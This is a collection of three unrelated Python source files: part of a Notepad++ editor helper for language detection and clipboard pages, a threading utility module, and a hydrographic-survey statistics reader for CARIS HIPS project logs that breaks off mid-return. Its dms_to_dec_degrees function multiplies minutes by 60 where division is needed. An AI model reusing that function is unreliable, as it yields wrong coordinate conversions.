bm[buff_id][lang]["alias"] = {} kw = ['alignas', 'alignof', 'and', 'and_eq', 'asm', 'auto', 'bitand', 'bitor', 'bool', 'break', 'catch', 'char', 'char16_t', 'char32_t', 'class', 'compl', 'const', 'constexpr', 'const_cast', 'continue', 'decltype', 'default', 'delete', 'do', 'double', 'dynamic_cast', 'else', 'enum', 'explicit', 'export', 'extern', 'float', 'for', 'friend', 'goto', 'if', 'int', 'long', 'mutable', 'namespace', 'new', 'noexcept', 'not', 'not_eq', 'nullptr', 'namespace', 'new', 'operator', 'or', 'or_eq', 'private', 'protected', 'public', 'register', 'reinterpret_cast', 'return', 'short', 'signed', 'sizeof', 'static', 'static_assert', 'static_cast', 'struct', 'switch', 'template', 'this', 'thread_local', 'throw', 'true', 'try', 'typedef', 'typeid', 'typename', 'union', 'unsigned', 'using', 'virtual', 'void', 'volatile', 'wchar_t', 'while', 'xor', 'xor_eq']; c = "class"; f = ""; # 'r' | 'u' | 'ur' | 'R' | 'U' | 'UR' | 'Ur' | 'uR' vd = ["null","true","false"]; fd = []; cd = []; tl = []; tmp = string_remover(txt,php_rr); ss = tmp.split("\n"); pt = None; for x in ss: y = re.split("[^a-zA-Z0-9_]{1}",x); t = []; pt = None; for z in y: if z != "": t.append(z); if(pt != None): #if((pt == f) and (z not in fd)): # fd.append(z); if((pt == c) and (z not in cd)): cd.append(z); if((z not in tl) and (z not in kw)): tl.append(z); pt = z; for x in tl: if((x not in fd) and (x not in cd) and (x not in vd) and check_eligible_word(x)): vd.append(x); cm = {"var":vd,"function":fd,"class":cd,"token":tl}; #Console.write(console,"php parse:\n------\n\n"+str(tmp)+"\n\n\n"); if(lang in atom_map): for x in atom_map[lang]: if(x in cm): bm[buff_id][lang][x] = cm[x]; def in_range(range_list,start,end): for r in range_list: if(((r[0] <= start)and(r[1] >= start)) or ((start <= r[0])and(end >= r[0])) or (start == r[0]) or (end == r[1])): return True; return False; def isolate_source(src,ttype,targ_rr,tag_list=[["<?php","?>"]],cpos=0): result = ""; range_list = []; type = ttype; # Get ranges at which excluded elements (regexes in targ_rr) occur for r in targ_rr: tr = []; st = 0; os = -1; while((os != st)): os = st; s = r[0].search(src,st); if(s == None): break; st = s.end()+1; tr.append([s.start(),s.end()]); # merge the ranges. tx = []; for x in tr: found = False; for y in range_list: # if ranges overlap, combine them. if(((x[0] <= y[0])and(x[1] >= y[0])) or ((y[0] <= x[0])and(y[1] >= x[0])) or (y[0] == x[0]) or (y[1] == x[1])): xs = x[0]; if(y[0] < x[0]): xs = y[0]; xe = x[1]; if(y[1] > x[1]): xe = y[1]; y[0] = xs; y[1] = xe; found = True; break; if(not found): tx.append(x); for x in tx: range_list.append(x); tg_range = []; src_len = len(src); for tg in tag_list: ts = 0; tgm = 0; tgl = [len(tg[0]),len(tg[1])]; tmp = src.find(tg[tgm]); while(tmp != -1): # check if tmp falls within the range of excluded elements (e.g. strings and comments). if(not in_range(range_list,tmp,tmp+tgl[tgm])): if(tgm == 0): tgm = 1; ts = tmp; else: tgm = 0; tg_range.append([ts,tmp + tgl[1]]); tmp = src.find(tg[tgm],tmp+tgl[tgm]); if((tgm == 1) and (ts != src_len)): tg_range.append([ts,src_len]); # Sort the script region occurrences. Assuming no overlap, as there should be none. t_range = []; for t in tg_range: pos = len(t_range); for i in range(0,pos): y = t_range[i]; if(y[0] >= t[0]): pos = i; break; t_range.insert(pos,t); # If type == 0, then remove the script regions. else, remove the external regions. # Remove without affecting char/line count if(type == 2): type = 0; for x in t_range: if((cpos >= x[0]) and (cpos < x[1])): type = 1; break; if(type == 0): result = src; while(len(t_range) > 0): t = t_range[0]; t_range.pop(0); tl = t[1] - t[0]; # re.sub(r"[^\n]{1}",r"-",s); result = "%s%s%s" % (result[0:t[0]],re.sub(r"[^\n]{1}",r" ",result[t[0]:t[1]]),result[t[1]:]); #result = "%s%s" % (result[0:t[0]],result[t[1]:]); #for x in t_range: # x[0] -= tl; # x[1] -= tl; else: # Reverse the ranges. x_range = []; ts = 0; sl = len(src); for t in t_range: if(ts < (t[0]-1)): x_range.append([ts,t[0]-1]); ts = t[1]; if(ts < sl): x_range.append([ts,sl]); result = src; while(len(x_range) > 0): t = x_range[0]; x_range.pop(0); tl = t[1] - t[0]; result = "%s%s%s" % (result[0:t[0]],re.sub(r"[^\n]{1}",r" ",result[t[0]:t[1]]),result[t[1]:]); #result = "%s%s" % (result[0:t[0]],result[t[1]:]); #for x in x_range: # x[0] -= tl; # x[1] -= tl; pass; return (type,result.replace("\r"," ")); def trim_lead(s,delim): d = delim; sl = len(s); for i in range(0,sl): x = s[i]; if(x not in delim): return s[i:]; return None; global err_msg; err_msg = ""; def get_tag_range_list(src,type=0,cpos=0): global err_msg; xml = None; # HTML ttype = 0; # xml tags = ["script","style"]; html_range = ["html","div","p","span","tr","td","table"]; tsrc = src; try: #Console.write(console,src); tsrc = src.replace("<?php"," ").replace("?>"," ").replace("&nbsp;"," "); xml = etree.XML(tsrc); except Exception as e: err_msg = "%s\n" % e; #Console.write(console,"ERROR:"+err_msg+"\n"); success = False; try: xml = etree.HTML(tsrc); success = True; except: pass; if(not success): try: tsrc = trim_lead(tsrc,[" ","\t","\n","\r"]); xml = etree.XML(tsrc); if(xml.tag.lower() not in html_range): return 0; else: return -1; except: return -1; return -1; # failure try: if(xml.tag.lower() in html_range): ttype = 1; # html else: return 0; except: return 0; range_list = []; try: for tagname in tags: x_range = []; range_list.append(x_range); ti = xml.getiterator(tagname); ssp = src.split("\n"); for t in ti: sl = t.sourceline; # Now find where the tag ends... # Pattern: iterate siblings, move up to parent, repeat until found or docroot (use end of file). tmp = t.getparent(); ln = None; lns = 0; x = 0; for i in range(0,sl-1): if(i >= len(ssp)): x = len(src); break; x += len(ssp[i]) + 1; ln2 = x; ssf = src.find(tagname,ln2); ssf = src.find(">",ssf); if(type == 1): if(ssf > cpos): break; # Not in range. Try the next tag. while(tmp != None): si = t.itersiblings(); for x in si: ln = x.sourceline; break; if(ln != None): break; tmp = tmp.getparent(); if(ln == None): ln = len(src); else: x = 0; for i in range(0,ln-1): if(i >= len(ssp)): x = len(src); break; if(len(tmp) > i): x += len(tmp[i]) + 1; ln = x; loc = ssf+(src[ssf:ln].rfind(tagname) - 1); if(type == 1): if((cpos >= ssf) and (cpos < loc)): return tagname; x_range.append([ssf,loc]); if(type == 1): return None; except Exception as e: err_msg = "[Line #%s]: %s\n" % (str(traceback.tb_lineno(sys.exc_traceback)),e); if(type == 1): return None; return -1; return range_list; current_buffid = None; #Notepad.getCurrentBufferID(notepad); try: f = open(serv_path+"\\grammar\\autolang.txt","r+"); line = f.readline(); f.close(); line = line.replace("\r","").replace("\n",""); if int(line) != 1: auto_lang = False; except: try: f = open(serv_path+"\\grammar\\autolang.txt","r+"); f.write("1"); f.flush(); f.close(); except: pass; def auto_lang_detect(): global current_buffid; global auto_lang; global lang_list; global reg_rr; global current_lang; global serv_path; global err_msg; default_lang = "python"; cbid = Notepad.getCurrentBufferID(notepad); ext = None; d = {"python":["py"],"php":["php"],"html":["html","htm"],"css":["css"],"javascript":["js"],"xml":["xml"],"c":["cpp","c","h","hpp"]}; ml = {"php":[["<?php","?>"],["<?","?>"]]}; cur_lang = default_lang; first_time = (current_buffid != cbid); fn = Notepad.getCurrentFilename(notepad); fns = fn.split("."); fnsl = len(fns); current_buffid = cbid; if(fnsl < 2): ext = default_lang; else: ext = fns[fnsl-1]; found = False; for k in d: if(ext in d[k]): found = True; ext = k; break; if(not found): ext = default_lang; src_lt = []; # Check the caret position for mixed language files (e.g. PHP files often contain html) if((ext in ml) and (ext in reg_rr)): cpos = ed.getCurrentPos(); src = editor.getText(); type = 0; iso_src = ""; type, iso_src = isolate_source(src,2,reg_rr[ext],ml[ext],cpos); #if(first_time): # Console.write(console,str((type,iso_src))); if(type == 1): # Script [internal primary language] src_lt.append([ext,iso_src]); # Get external source. type, ext_src = isolate_source(src,0,reg_rr[ext],ml[ext]); # Dissect it for inline CSS and JavaScript if it's HTML. rng_lt = get_tag_range_list(ext_src); if(rng_lt == 0): src_lt.append(["xml",ext_src]); elif(rng_lt == -1): if(first_time): #Console.write(console,"[PHP] Not XML\n-----\n"); with open(serv_path+"\\x1.xml","w+") as f: f.write(ext_src); f.flush(); with open(serv_path+"\\x2.xml","w+") as f: f.write(iso_src); f.flush(); pass; # nothing... neither xml nor html. else: ss = ""; res_src = ext_src; for x in rng_lt[0]: ss = "%s\n%s" % (ss,ext_src[x[0]:x[1]]); res_src = "%s%s%s" % (res_src[0:x[0]], re.sub(r"[^\n]{1}",r" ",res_src[x[0]:x[1]]), res_src[x[1]:]); if(ss != ""): src_lt.append(["javascript",ss]); ss = ""; for x in rng_lt[1]: ss = "%s\n%s" % (ss,ext_src[x[0]:x[1]]); res_src = "%s%s%s" % (res_src[0:x[0]], re.sub(r"[^\n]{1}",r" ",res_src[x[0]:x[1]]), res_src[x[1]:]); if(ss != ""): src_lt.append(["css",ss]); src_lt.append(["html",res_src]); else: # external language (e.g. html) # Get internal source. type, int_src = isolate_source(src,1,reg_rr[ext],ml[ext]); src_lt.append([ext,int_src]); ext_src = iso_src; rng_lt = get_tag_range_list(iso_src); t_ext = "html"; #if(first_time): # pass; #Console.write(console,"[EXTERNAL] XML CHECK:\n"+str(rng_lt)+"\n\n\n");#+str(iso_src); #etree.XML(trim_lead(iso_src," ")); if(rng_lt == 0): src_lt.append(["xml",ext_src]); t_ext = "xml"; elif(rng_lt == -1): if(first_time): Console.write(console,"[EXTERNAL] Not XML!\n"+err_msg); """ with open(serv_path+"\\x1.xml","w+") as f: f.write(iso_src.replace("<?php"," ").replace("?>"," ").replace("&nbsp;"," ")); f.flush(); with open(serv_path+"\\x1.xml","w+") as f: f.write(ext_src); f.flush(); with open(serv_path+"\\x2.xml","w+") as f: f.write(int_src); f.flush(); """ pass; pass; # nothing... neither xml nor html. else: ss = ""; res_src = ext_src; for x in rng_lt[0]: ss = "%s\n%s" % (ss,ext_src[x[0]:x[1]]); res_src = "%s%s%s" % (res_src[0:x[0]], re.sub(r"[^\n]{1}",r" ",res_src[x[0]:x[1]]), res_src[x[1]:]); if(ss != ""): src_lt.append(["javascript",ss]); ss = ""; for x in rng_lt[1]: ss = "%s\n%s" % (ss,ext_src[x[0]:x[1]]); res_src = "%s%s%s" % (res_src[0:x[0]], re.sub(r"[^\n]{1}",r" ",res_src[x[0]:x[1]]), res_src[x[1]:]); if(ss != ""): src_lt.append(["css",ss]); src_lt.append(["html",res_src]); # detect language. res = get_tag_range_list(iso_src,1,cpos); if(res == -1): #Console.write(console,"[EXTERNAL] CHECK: ["+str(res)+"] FOUND\n"); pass; if(res == "script"): ext = "javascript"; #Console.write(console,"[EXTERNAL] JAVASCRIPT FOUND\n");#+str(iso_src); elif(res == "style"): ext = "css"; else: ext = "html"; if(t_ext == "xml"): ext = "xml"; elif(ext == "html"): # detect language. cpos = ed.getCurrentPos(); txt = editor.getText(); res = get_tag_range_list(txt,1,cpos); if(res == "script"): ext = "javascript"; elif(res == "style"): ext = "css"; else: ext = "html"; src_lt.append([ext,txt]); else: src_lt.append([ext,editor.getText()]); pass; if(auto_lang):# and (current_buffid != cbid)): try: #Console.write(console,"Switch to: "+str(ext)+"\n"); if(ext != current_lang): current_lang = ext; Console.write(console,"Switch to: "+str(ext)+"\n"); with open(serv_path+"\\grammar\\context.txt","w+") as f: f.write(ext); f.flush(); except: pass; return src_lt; dm = {"python":"py","php":"php","html":"html","css":"css","javascript":"js","xml":"xml","c":"cpp"}; def memcomplete(): global buffid_list; global lang_list; global atom_list; global atom_map; global m_vd; global m_fd; global m_cd; global m_tl; global dm; default_lang = "php"; d = {"py":parse_py,"php":parse_php,"html":parse_html,"css":parse_css,"js":parse_js,"xml":parse_xml,"cpp":parse_cpp}; ext = None; while(True): time.sleep(0.5); cbid = Notepad.getCurrentBufferID(notepad); src_lt = auto_lang_detect(); fl = Notepad.getFiles(notepad); buff_list = []; for f in fl: fn = f[0]; buff_id = f[1]; if(buff_id not in buff_list): buff_list.append(buff_id); buff_index = f[2]; buff_side = f[3]; fns = fn.split("."); fnsl = len(fns); if(fnsl < 2): ext = default_lang; else: ext = fns[fnsl-1]; if(ext not in d): ext = default_lang; if(buff_id not in bm): tm = {}; tm[ext] = {}; tm[ext]["alias"] = {}; bm[buff_id] = tm; if(ext in atom_map): for a in atom_map[ext]: tm[ext][a] = []; tm[ext]["alias"][a] = {}; if(cbid == buff_id): #txt = editor.getText(); for x in src_lt: t_ext = x[0]; if(t_ext in dm): t_ext = dm[t_ext]; d[t_ext](x[1],buff_id); xl = []; for b in bm.keys(): if(b not in buff_list): xl.append(b); for x in xl: bm.pop(x); cd_re = re.compile("[\\\/]*"); def page_match(cdir,pgdir): global cd_re; da = cd_re.split(cdir); pa = cd_re.split(pgdir); # Pop unneeded leading element. da.pop(0); pa.pop(0); dal = len(da); pal = len(pa); if(dal < pal): return 0; for i in range(0,pal): if(da[i] != pa[i]): return 0; return (dal - pal) + 1; def cbmanager(): global ed; global icb_max; global cb_buff; global internal_cb; global cb_page_map; global cb_page_bmap; global cb_page_default; global cb_page; global serv_path; global cb_page_auto_detect; try: raw = ""; with open(serv_path+"\\clipboard\\autopage.ini","r+") as f: raw = f.readline(); r = raw.replace("\r","").replace("\t","").replace(" ","").replace("\n",""); n = int(r); if(n != 1): cb_page_auto_detect = False; else: cb_page_auto_detect = True; except: pass; # Get page list. # Roll out a subprocess for the client process. sub = subprocess.Popen(["python","-u",serv_path+"\\clipboard\\cb_client.py",":pagelist"],shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.STDOUT); try: #print "Awaiting input..."; raw = sub.communicate()[0]; rl = raw.split("\n"); for r in rl: rs = r.split(","); rl = len(rs); if(rl < 3): try: sub.terminate(); except: pass; break; try: tmp = [rs[0],int(rs[2]),rs[3],int(rs[4])]; cb_page_bmap[rs[1]] = tmp; except: pass; except: pass; cb_page_map[cb_page_default] = [""] * icb_max; cb_page = cb_page_default; cb_buff = cb_page_bmap[cb_page_default][3] - 1; for i in range(0,icb_max): # Load up the buffers from the database for the default page file. sub = subprocess.Popen(["python","-u",serv_path+"\\clipboard\\cb_client.py",":page",str(cb_page_default),":buffer",str(i+1)],shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.STDOUT); try: raw = sub.communicate()[0]; cb_page_map[cb_page_default][i] = raw; except: pass; pass; internal_cb = cb_page_map[cb_page_default]; while(True): time.sleep(0.1); fl = Notepad.getFiles(notepad); tpl = []; for f in fl: fn = f[0]; cfn = False; if(fn == Notepad.getCurrentFilename(notepad)): cfn = True; dir = get_dirname(fn); m = None; for k,v in cb_page_bmap.iteritems(): cbd = v[2]; n = page_match(dir,cbd); # Matches and is stronger match than any previous matching page entry. if((n != 0) and ((m == None) or (m[1] > n))): m = [k,n]; # Match found... if(m != None): if(m[0] not in cb_page_map): tpl.append(m[0]); t = cb_page_bmap[m[0]]; cb_page_map[m[0]] = [""] * t[1]; for i in range(0,t[1]): # Load up the buffers from the database for this page file. sub = subprocess.Popen(["python","-u",serv_path+"\\clipboard\\cb_client.py",":page",str(m[0]),":buffer",str(i+1)],shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.STDOUT); #print "Awaiting input..."; try: raw = sub.communicate()[0]; cb_page_map[m[0]][i] = raw; except: pass; pass; if(cfn and cb_page_auto_detect and (cb_page != m[0]) and (m[0] in cb_page_map)): #m = cb_page_bmap[m[0]]; internal_cb = cb_page_map[m[0]]; m2 = cb_page_bmap[m[0]]; cb_page = m[0]; cb_buff = m2[3] - 1; #icb_max = m[1]; elif(cfn and cb_page_auto_detect and (cb_page != cb_page_default)): internal_cb = cb_page_map[cb_page_default]; cb_page = cb_page_default; cb_buff = cb_page_bmap[cb_page_default][3] - 1; """ el = []; for x in cb_page_map.iterkeys(): if(x not in tpl): el.append(x); for x in el: try: cb_page_map.pop(x); except: pass; """ if __name__ == '__main__': #print "test point 1\n"; Thread(target=cmd_server).start(); Thread(target=paste_server).start(); Thread(target=memcomplete).start(); Thread(target=cbmanager).start(); Thread(target=dragon_thread).start();
fctthread.py
"""Control methods in separate threads.""" import logging import os import queue import subprocess as _subp import sys import threading __version__ = '0.2.10' logger = logging.getLogger(__name__) #------------------------------------------------------- def _popen_ext(cmd, shell=False): _subp.Popen(cmd, shell=shell, start_new_session=True, stdin=_subp.DEVNULL, stdout=_subp.DEVNULL, stderr=_subp.DEVNULL) if sys.platform.startswith('win'): def _start_file(cmd): os.startfile(cmd) elif sys.platform.startswith('linux'): def _start_file(cmd): _popen_ext(['xdg-open', cmd]) else: raise ImportError(f'platform {sys.platform} not supported') def shell_cmd(cmd): """Process a shell command within python.""" return _subp.run(cmd, shell=True, stdin=_subp.DEVNULL, stdout=_subp.PIPE, stderr=_subp.STDOUT).stdout.decode(errors='replace') def start_app(cmd): """Start application or open file.""" try: if not isinstance(cmd, str): _popen_ext(cmd) elif os.path.isfile(cmd): _start_file(cmd) else: _popen_ext(cmd, shell=True) return True except Exception: logger.exception('not possible to start app, command: %s', cmd) return False def start_daemon(target, args=(), kwargs=None): """Start and return daemon thread.""" t = threading.Thread(target=target, args=args, kwargs=kwargs, daemon=True) t.start() return t def start_internal_thread(target, args=(), kwargs=None): logger.warning('start_internal_thread deprecated, use start_daemon') return start_daemon(target, args, kwargs) #------------------------------------------------------- class ThreadLoop: """Class to control function in a daemon thread. Loops over target() until calling stop or the target returns True. """ def __init__(self, target): self._t = None self._target = target self._lock = threading.Lock() self._start_flag = False self._should_run = False self._stop_flag = False def _handle(self): while True: try: while self._should_run and not self._start_flag: if self._target(): break except Exception: logger.exception('ThreadLoop callback error') with self._lock: if self._start_flag: self._start_flag = False self._should_run = True else: self._should_run = False self._stop_flag = True return def start(self): with self._lock: self._start_flag = True if self._stop_flag: self._t.join() if not self.is_alive(): self._stop_flag = False self._t = threading.Thread(target=self._handle, daemon=True) self._t.start() def stop(self, timeout=None): if not self._t: return True with self._lock: self._start_flag = False self._should_run = False self._t.join(timeout) return not self._t.is_alive() def join(self, timeout=None): if self._t: self._t.join(timeout) def is_alive(self): return self._t.is_alive() if self._t else False class QueueWorker: """Class to process elements from a queue in separate threads. If a thread is not called within timeout seconds it will be stopped. """ def __init__(self, target, maxthreads=2, *, timeout=10): if maxthreads <= 0: raise ValueError('number of threads must be at least 1') if timeout < 0: raise ValueError('timeout must be a nonnegative number') self._target = target self._maxthreads = maxthreads self._timeout = timeout self._enabled = False self._active_loops = 0 self._q = queue.Queue(maxthreads) self._lock = threading.Lock() self._all_done = threading.Condition(self._lock) def _handle(self): while True: try: while self._enabled: x = self._q.get(timeout=self._timeout) try: self._target(x) except Exception: logger.exception('QueueWorker callback error') finally: self._q.task_done() except queue.Empty: pass finally: with self._lock: if not self._enabled or self._active_loops > self._q.unfinished_tasks: self._active_loops -= 1 self._all_done.notify_all() return def _start_thread(self): # self._lock must be locked if self._active_loops < self._maxthreads: threading.Thread(target=self._handle, daemon=True).start() self._active_loops += 1 def _check(self): # make sure self._lock is locked # will be removed in the future if self._active_loops < 0 or self._active_loops > self._maxthreads or \ self._active_loops + self._q.qsize() < self._q.unfinished_tasks: logger.critical('QueueWorker bad number of loops: %s', self.info()) def put(self, x, timeout=None): self._q.put(x, timeout=timeout) with self._lock: self._check() if self._active_loops < self._q.unfinished_tasks: self._start_thread() def start(self): with self._lock: self._check() if self._enabled: return self._enabled = True for _ in range(self._q.qsize()): self._start_thread() def stop(self, timeout=None): with self._lock: self._enabled = False self.join(timeout) return not self._active_loops def join(self, timeout=None): with self._all_done: self._all_done.wait_for(lambda: self._active_loops<=0, timeout) def is_alive(self): return self._enabled or self._active_loops > 0 def info(self): return {'enabled': self._enabled, 'loops': self._active_loops, 'unfinished': self._q.unfinished_tasks, 'waiting': self._q.qsize()} class CmpEvent: """Class to receive data from another thread after a successful comparison. This data is accessible with CmpEvent.result. An optional answer can be sent to the compare thread. """ def __init__(self): self._cond = threading.Condition(threading.Lock()) self.result = None self._cmpval = None self._answer = None self._waiting = False def init(self, cmpval, answer=True): with self._cond: self.result = None self._cmpval = cmpval self._answer = answer self._waiting = True def wait(self, timeout=None): """Return False while waiting for a match, True otherwise.""" with self._cond: return self._cond.wait(timeout) if self._waiting else True def compare(self, cmpval, result): if self._waiting: with self._cond: if cmpval == self._cmpval: self.result = result self._waiting = False self._cond.notify_all() return self._answer return None
carisapi.py
import os import sys import time import re import subprocess import datetime import tempfile from queue import Queue, Empty import threading import xml.etree.ElementTree as ET import json from math import cos, sin, asin, sqrt, degrees from collections import defaultdict import glob from winreg import ConnectRegistry, HKEY_LOCAL_MACHINE, OpenKey, QueryValueEx import geopy.distance import numpy as np from pyproj import Proj, transform import hyo2.grids.csar2 # hydrofficecsar.raw.csar from hyo2.grids.grids_manager import GridsManager from HSTB.time.UTC import UTCs80ToDateTime import HSTB.resources # This should be moved out of the HSTB.drivers.carisapi or the test data moved local to drivers from HSTB.Charlene import benchmark from HSTB.Charlene import processing_report from HSTB.Charlene import pyText2Pdf import HSTB.Charlene charlene_test_folder = os.path.join(os.path.realpath(os.path.dirname(HSTB.Charlene.__file__)), 'tests') _TCARI_CONVERTED = False _HDCSIO_CONVERTED = False if _TCARI_CONVERTED: from HSTB.tides import tidestation from HSTB.tides.tcari import TCARI if _HDCSIO_CONVERTED: pass from HSTB.drivers import HDCSio def hdcsio_read(): nav = HDCSio.HDCSNav('Navigation') return nav else: def hdcsio_read(): raise NotImplementedError("HDCSio is not implemented in Python 3 yet") ON_POSIX = 'posix' in sys.builtin_module_names # lic_success, val = HDCSio.InitLicenseHDCS() # if not lic_success: # print "Pydro License did not initialize for MAC:" # print HDCSio.GetLicenseCredentials() # else: # print 'Pydro License: {}'.format(HDCSio.GetLicenseCredentials()) def haversine(lon1, lat1, lon2, lat2): """ Calculate the great circle distance between two points on the earth (specified in decimal degrees) """ # convert decimal degrees to radians # lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2]) # haversine formula dlon = lon2 - lon1 dlat = lat2 - lat1 a = sin(dlat / 2)**2 + cos(lat1) * cos(lat2) * sin(dlon / 2)**2 c = 2 * asin(sqrt(a)) r = 3440 # Radius of earth in nautical miles. Use 6371 for kilometers. 3959 for miles. return c * r def dms_to_dec_degrees(d, m, s): decdegrees = d + (m * 60) + (s / 3600) return decdegrees def vincenty(lon1, lat1, lon2, lat2): # convert radians to decimal degrees lon1, lat1, lon2, lat2 = degrees(lon1), degrees(lat1), degrees(lon2), degrees(lat2) # vincenty accounts for oblate spheroid return geopy.distance.vincenty((lat1, lon1), (lat2, lon2)).nm # def pydro_lic_check(): # return lic_success def read_stats_from_hdcs(projfolder, vers): if vers >= 11: stats = read_stats_from_hdcs_v11(projfolder) return stats else: stats = read_stats_from_hdcs_v10(projfolder) return stats def read_stats_from_hdcs_v11(projfolder): mintime = [] maxtime = [] tottime = [] lats = [] lons = [] lnm = [] hdcsio_lnm = [] process_history = [] nav = hdcsio_read() data = [['' for x in range(3)] for y in range(len(os.listdir(projfolder)))] hdcsfolders = [] for fold in os.listdir(projfolder): if os.path.isdir(os.path.join(projfolder, fold)): hdcsfolders.append(fold) for count, hdcsfolder in enumerate(hdcsfolders): processlog = os.path.join(projfolder, hdcsfolder, 'Process.log') try: with open(processlog) as jsonfile: jsondata = json.load(jsonfile) navdata = nav.ReadTimeSeries(os.path.join(projfolder, hdcsfolder)) i = 0 navdata = np.array(navdata) if os.path.exists(os.path.join(projfolder, hdcsfolder, 'LogFile')): process_history.append(tuple((hdcsfolder, 'ImportTideToHIPS'))) while i < len(navdata) - 1: hdcsio_lnm.append(vincenty(navdata[i][2], navdata[i][1], navdata[i + 1][2], navdata[i + 1][1])) i += 1 for proc in jsondata['processes']: procid = str(proc['definition']['base']['identification']['id']) process_history.append(tuple((hdcsfolder, procid))) if procid[:12] == 'ImportToHIPS': data[count][0] = proc['parameters']['Metadata']['ConversionSummary'].splitlines() if 'BathySummary' in list(proc['parameters']['Metadata'].keys()): data[count][1] = proc['parameters']['Metadata']['BathySummary'].splitlines() if 'NavigationSummary' in list(proc['parameters']['Metadata'].keys()): navtext = proc['parameters']['Metadata']['NavigationSummary'].splitlines() data[count][2] = navtext mintemp = time.strptime(navtext[5].split('=')[1], '%Y %j %H:%M:%S') maxtemp = time.strptime(navtext[7].split('=')[1], '%Y %j %H:%M:%S') mintime.append(mintemp) maxtime.append(maxtemp) tottime.append(time.mktime(maxtemp) - time.mktime(mintemp)) lat1 = float(navtext[8].split('=')[1]) lat2 = float(navtext[9].split('=')[1]) lon1 = float(navtext[10].split('=')[1]) lon2 = float(navtext[11].split('=')[1]) lnm.append(haversine(lon1, lat1, lon2, lat2)) lats.extend([degrees(lat1), degrees(lat2)]) lons.extend([degrees(lon1), degrees(lon2)]) except: print('Unable to read process log from line {}'.format(processlog)) return history_dict = defaultdict(list) for line, proc in process_history: history_dict[line].append(proc) starttime = time.strftime('%j %H:%M:%S', min(mintime)) endtime = time.strftime('%j %H:%M:%S', max(maxtime)) tot = np.array(tottime) totaltime = tot.sum() tot = np.array(hdcsio_lnm) totalmiles = tot.sum() lats, lons = np.array(lats), np.array(lons) extent_stats = [lats.min(), lats.max(), lons.min(), lons.max()] return {'history_dict': history_dict, 'process_history': process_history, 'starttime': starttime, 'endtime': endtime, 'totaltime': totaltime, 'totalmiles': totalmiles, 'data': data, 'hdcsio_lnm': hdcsio_lnm, 'extent_stats': extent_stats} def read_stats_from_hdcs_v10(projfolder): mintime = [] maxtime = [] tottime = [] lats = [] lons = [] lnm = [] hdcsio_lnm = [] process_history = [] nav = hdcsio_read() data = [['' for x in range(3)] for y in range(len(os.listdir(projfolder)))] for count, hdcsfolder in enumerate(os.listdir(projfolder)): processlog = os.path.join(projfolder, hdcsfolder, 'Process.log') try: tree = ET.parse(processlog) root = tree.getroot() found = False navdata = nav.ReadTimeSeries(os.path.join(projfolder, hdcsfolder)) i = 0 navdata = np.array(navdata) if os.path.exists(os.path.join(projfolder, hdcsfolder, 'LogFile')): process_history.append(tuple((hdcsfolder, 'ImportTideToHIPS'))) while i < len(navdata) - 1: hdcsio_lnm.append(vincenty(navdata[i][2], navdata[i][1], navdata[i + 1][2], navdata[i + 1][1])) i += 1 for process in root.iterfind('process'): id = process.find('id') process_history.append(tuple((hdcsfolder, id.text))) if id.text[:12] == 'ImportToHIPS': for port in process.findall('port'): if port.find('id').text == 'Metadata': for attribute in port.find('source').find('data').find('complex').findall('attribute'): if attribute.find('id').text == 'ConversionSummary': converttext = attribute.find('simple').find('value').text.splitlines() data[count][0] = converttext if attribute.find('id').text == 'BathySummary': try: bathytext = attribute.find('simple').find('value').text.splitlines() data[count][1] = bathytext except: pass if attribute.find('id').text == 'NavigationSummary': navtext = attribute.find('simple').find('value').text.splitlines() data[count][2] = navtext mintemp = time.strptime(navtext[5].split('=')[1], '%Y %j %H:%M:%S') maxtemp = time.strptime(navtext[7].split('=')[1], '%Y %j %H:%M:%S') mintime.append(mintemp) maxtime.append(maxtemp) tottime.append(time.mktime(maxtemp) - time.mktime(mintemp)) lat1 = float(navtext[8].split('=')[1]) lat2 = float(navtext[9].split('=')[1]) lon1 = float(navtext[10].split('=')[1]) lon2 = float(navtext[11].split('=')[1]) lnm.append(haversine(lon1, lat1, lon2, lat2)) lats.extend([degrees(lat1), degrees(lat2)]) lons.extend([degrees(lon1), degrees(lon2)]) found = True break if found: break except: # We had one odd example of a json process log in 10.4.2, try to read it here just in case try: with open(processlog) as jsonfile: jsondata = json.load(jsonfile) navdata = nav.ReadTimeSeries(os.path.join(projfolder, hdcsfolder)) i = 0 navdata = np.array(navdata) if os.path.exists(os.path.join(projfolder, hdcsfolder, 'LogFile')): process_history.append(tuple((hdcsfolder, 'ImportTideToHIPS'))) while i < len(navdata) - 1: hdcsio_lnm.append(vincenty(navdata[i][2], navdata[i][1], navdata[i + 1][2], navdata[i + 1][1])) i += 1 for proc in jsondata['processes']: procid = str(proc['definition']['base']['identification']['id']) process_history.append(tuple((hdcsfolder, procid))) if procid[:12] == 'ImportToHIPS': data[count][0] = proc['parameters']['Metadata'][0]['ConversionSummary'][0].splitlines() if 'BathySummary' in list(proc['parameters']['Metadata'][0].keys()): data[count][1] = proc['parameters']['Metadata'][0]['BathySummary'][0].splitlines() if 'NavigationSummary' in list(proc['parameters']['Metadata'][0].keys()): navtext = proc['parameters']['Metadata'][0]['NavigationSummary'][0].splitlines() data[count][2] = navtext mintemp = time.strptime(navtext[5].split('=')[1], '%Y %j %H:%M:%S') maxtemp = time.strptime(navtext[7].split('=')[1], '%Y %j %H:%M:%S') mintime.append(mintemp) maxtime.append(maxtemp) tottime.append(time.mktime(maxtemp) - time.mktime(mintemp)) lat1 = float(navtext[8].split('=')[1]) lat2 = float(navtext[9].split('=')[1]) lon1 = float(navtext[10].split('=')[1]) lon2 = float(navtext[11].split('=')[1]) lnm.append(haversine(lon1, lat1, lon2, lat2)) lats.extend([degrees(lat1), degrees(lat2)]) lons.extend([degrees(lon1), degrees(lon2)]) except: print('Unable to read process log from line {}'.format(processlog)) return history_dict = defaultdict(list) for line, proc in process_history: history_dict[line].append(proc) starttime = time.strftime('%j %H:%M:%S', min(mintime)) endtime = time.strftime('%j %H:%M:%S', max(maxtime)) tot = np.array(tottime) totaltime = tot.sum() tot = np.array(hdcsio_lnm) totalmiles = tot.sum() lats, lons = np.array(lats), np.array(lons) extent_stats = [lats.min(), lats.max(), lons.min(), lons.max()] return {'history_dict': history_dict, 'process_history': process_history, 'starttime': starttime, 'endtime': endtime, 'totaltime': totaltime, 'totalmiles': totalmiles, 'data': data, 'hdcsio_lnm': 